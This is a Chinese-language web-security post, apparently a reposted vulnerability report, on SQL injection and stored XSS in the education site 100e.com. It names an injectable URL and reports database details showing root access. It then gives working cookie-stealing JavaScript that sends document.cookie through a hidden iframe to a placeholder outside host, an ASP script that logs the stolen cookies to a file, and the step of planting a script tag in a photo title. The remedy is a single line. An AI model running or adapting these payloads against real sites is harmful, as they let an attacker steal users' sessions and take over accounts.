好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

100e两个注入一个XSS - 网站安全 - 自学php

伪静态注入

 

 

直接丢Havjj里

 

http://xyz.edudemo.100e.com/paperdetail.aspx?id=1075 

 

 

 

 

都存在注入,皆为root。

Powered-by: ASP.NET

DB Server: MySQL error based

Resp. Time(avg):306 ms

Sql Version: 5.1.41-log

Current DB: 100eDB

Host Name: localhost.localdomain

Installation dir: /usr/local/ mysql /

DB User & Pass: root::localhost

http://www.100e.com/ 进入首页即可触发XSS 测试可以无声无息的盗取了cookie ,应该还可以融虫吧,表示没试过

利用:

 

 

在个人管理里面选择上传照片 然后照片随便 标题就写 XSS代码 这次测试的是 盗取 cookie 

 

 

JS代码

var str=escape(window.location.pathname);

cv=escape(document.cookie);

function f()

{

ifm=document.createElement("IFRAME");

document.body.appendChild(ifm);

ifm.width=0;

ifm.height=0;

ifm.src="http://www.xxxx.com/1.asp?s="+str+"|"+cv;

}

setTimeout(f,"1000");

ASP代码

<%

s=request("s")

if s <> "" then

set fso=Server.CreateObject("Scripting.FileSystemObject")

with fso.opentextfile(server.mappath("1.txt"),8,true)

.writeline s

.close

End with

end if

%>

触发后会在当前目录生成1.txt并把截取到的cookie放进去

 

 

然后在照片标题处写 <script src=http://xxxxxxxxx.com/1.js>

 

 

保存 

 

这时再打开首页 会和往常一样正常,不过你的cookie已经被截取了,发往了某网站空间里面的1.txt文件里

 

 

 

修复方案: 过滤一下关键字 

 

查看更多关于100e两个注入一个XSS - 网站安全 - 自学php的详细内容...

  阅读:41次